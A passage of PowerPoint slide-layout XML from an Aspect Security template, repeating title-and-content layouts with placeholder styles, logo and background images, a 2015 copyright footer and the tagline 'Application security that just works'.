          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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7_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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8_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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9_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
